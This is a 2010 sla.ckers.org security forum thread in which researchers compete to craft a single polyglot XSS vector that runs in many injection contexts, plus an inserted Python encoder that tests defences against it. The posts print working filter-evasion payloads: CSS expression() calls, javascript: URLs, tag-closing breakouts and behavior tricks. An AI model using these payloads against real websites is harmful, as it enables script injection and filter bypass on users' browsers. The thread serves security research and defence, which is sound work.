Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Challenge: How many vectors can you fit into one vector
Posted by: Gareth Heyes
Date: September 09, 2010 08:13AM

After the success of my JS compression challenge =) I thought it would be cool to try and figure out what I've been experimenting with: how many vectors can you fit into one vector? The idea is you take the following vector:-

">1<top -/style=-=expression&#40&#47;&#42;'/-/*&#39;,/**/alert(1)//&#41;;>"

and it works in all contexts :D so... x='vector'; or x="vector" or <input x="vector"> or <a onclick="x='vector'"> etc

Rules
-----
1. Only one payload, e.g. alert(1), must be called by all vectors; no duplicates
2. The vector must work in all contexts you define
3. Most contexts wins, and shortest overall vector
4. Any type of vuln is allowed :) SQLi, remote inclusion, XSS, etc.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]
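
A defender's counterpart to the polyglot above, added here as an example and not code from the thread: a context-aware encoder that takes the vector verbatim and checks that it stays inert in each of the sinks the post lists (JS string, HTML attribute, JS string inside an attribute) when encoded for the innermost parser first, while a single backslash-style escape applied to an HTML attribute still leaves delimiters. The function names, the DELIMITERS sets and the templates are my own assumptions.

```python
import html
import json

# Sample input: the polyglot from the opening post, copied verbatim.
POLYGLOT = ('">1<top -/style=-=expression&#40&#47;&#42;'
            "'/-/*&#39;,/**/alert(1)//&#41;;>\"")

# Characters that must not survive encoding for each sink (assumption: these are
# the delimiters that let a value escape the contexts the post lists).
DELIMITERS = {
    "html_attr":  set('<>"\''),
    "js_string":  set('\'"<>/&\n\r'),
}
DELIMITERS["js_in_attr"] = DELIMITERS["html_attr"] | DELIMITERS["js_string"]

# Sinks from the post: x='vector', <input x="vector">, <a onclick="x='vector'">.
TEMPLATES = {
    "html_attr":  ('<input x="', '">'),
    "js_string":  ("<script>x='", "';</script>"),
    "js_in_attr": ("<a onclick=\"x='", "'\">"),
}

def js_string_encode(value: str) -> str:
    """\\uXXXX-escape every UTF-16 code unit except ASCII letters and digits, so the
    result is inert in a single- or double-quoted JS literal and cannot form
    </script> or an HTML entity such as &#39; (the trick the polyglot relies on)."""
    units = value.encode("utf-16-be")
    out = []
    for i in range(0, len(units), 2):
        cu = (units[i] << 8) | units[i + 1]
        out.append(chr(cu) if cu < 128 and chr(cu).isalnum() else "\\u%04x" % cu)
    return "".join(out)

def encode_for(context: str, value: str) -> str:
    """Encode for the innermost parser first, then for each enclosing one."""
    if context == "html_attr":
        return html.escape(value, quote=True)
    if context == "js_string":
        return js_string_encode(value)
    if context == "js_in_attr":      # JS literal inside an HTML attribute: JS, then HTML
        return html.escape(js_string_encode(value), quote=True)
    raise ValueError(context)

def naive_js_escape(value: str) -> str:
    """Backslash escaping only (json.dumps style): what a single-layer filter does."""
    return json.dumps(value)[1:-1]

def leaks_delimiters(context: str, encoded: str) -> bool:
    """True if any delimiter for the sink survived, i.e. the value can break out."""
    return any(c in DELIMITERS[context] for c in encoded)

def render(context: str, value: str) -> str:
    left, right = TEMPLATES[context]
    return left + encode_for(context, value) + right
```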
Re: Challenge: How many vectors can you fit into one vector
Posted by: Gareth Heyes
Date: September 15, 2010 03:25AM

Hmmm well I have 19 so far, can you beat that?

Re: Challenge: How many vectors can you fit into one vector
Posted by: LeverOne
Date: September 15, 2010 07:22PM

1)
Quote

-o-link:javascript:eval(title)

should be:

-o-link:attr(name) ... name=javascript:alert(1)

2)
Quote

expression&#40&#47;&#42;'/-/*&#39;,/**/eval(name)//&#41;

should be:

expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*/&#41;

3)
Quote

</marquee></script></title></textarea></noscript></style></xmp>

- </marquee> is not a plaintext tag

+ </noembed>
+ </comment>
+ </xml>
+ </iframe>

4) VML behavior for <IMG> tag?

----------------------
~Veritas~

Re: Challenge: How many vectors can you fit into one vector
Posted by: Gareth Heyes
Date: September 16, 2010 03:16AM

1) Yeah I can remove that now because originally it was not a img tag and so I had to use something that was also a global object but I figured out I could do "
Re: Challenge: How many vectors can you fit into one vector
Posted by: LeverOne
Date: September 18, 2010 12:13AM

@Gareth

/reset

1) As I said, it does not work : <div style=x:expression(write(123)//)> (see my variant)

2) -=expr... - yes, this is your cool trick. But for quirks mode only! Why do you want these constraints? )

http://heideri.ch/jso/?quirks%20mode

3) As the world already knows, there are several forms to replace comments

http://heideri.ch/#39
http://heideri.ch/#91 [ B],[D]

-->]]>%>?>

4) There is always a tiny chance that some structures will not be interrupted. I mean

http://heideri.ch/#91 [C]

We can open any number of sections within other sections. But it is only in theory.

5) Maybe it might be better to add -ms-behavior:url(#default#time2) + onbegin, so this vector is able to work in compatibility mode for IE8+?

Re: Challenge: How many vectors can you fit into one vector
Posted by: Gareth Heyes
Date: September 20, 2010 03:51AM

LeverOne Wrote:
-------------------------------------------------------
> @Gareth
>
> /reset
>
> 1) As I said, it does not work : (see my
> variant)

Yeah must have made a mistake when I tested it

> 2) -=expr... - yes, this is your cool trick. But
> for quirks mode only! Why do you want these
> constraints? )

It has to be valid JavaScript syntax to fit into the DOM XSS rule as well. Maybe using top as a CSS prop name would work, as it is inside a regex :)

> http://heideri.ch/jso/?quirks%20mode
>
> 3) As the world already knows, there are several
> forms to replace comments
>
> http://heideri.ch/#39
> http://heideri.ch/#91 [ B],
>
> -->]]>%>?>

I guess I could add %> and ?> but there would be more severe problems anyway if these worked


>
> 4) There is always a tiny chance that some
> structures will not be interrupted. I mean
>
> http://heideri.ch/#91
>
> We can open any number of sections within other
> sections. But it is only in theory.
>
> 5) May be it might be better to add
> -ms-behavior:url(#default#time2) + onbegin , so
> this vector is able to work in compatibility mode
> for IE8+?

Cool idea yeah I'll add it

Re: Challenge: How many vectors can you fit into one vector
Posted by: Gareth Heyes
Date: September 20, 2010 05:05AM

Seems to work. DOM rules require a name assignment first:-

javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">

Re: Challenge: How many vectors can you fit into one vector
Posted by: rsnake
Date: January 05, 2011 11:26AM

Cool idea. May want to add variable width encoding escape here too... although technically it qualifies as an attribute escape, so maybe it gets you no extra points. Same deal with null bytes in HTML tags - not sure if that gives you extra points by those rules.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Challenge: How many vectors can you fit into one vector
Posted by: Gareth Heyes
Date: January 14, 2011 08:37AM

@rsnake

Yeah, those are valid, as a filter could filter some HTML tags but miss null bytes too. But anyway, I got bored of this challenge after around 19 vectors; it becomes a pain in the ass to test after a while.
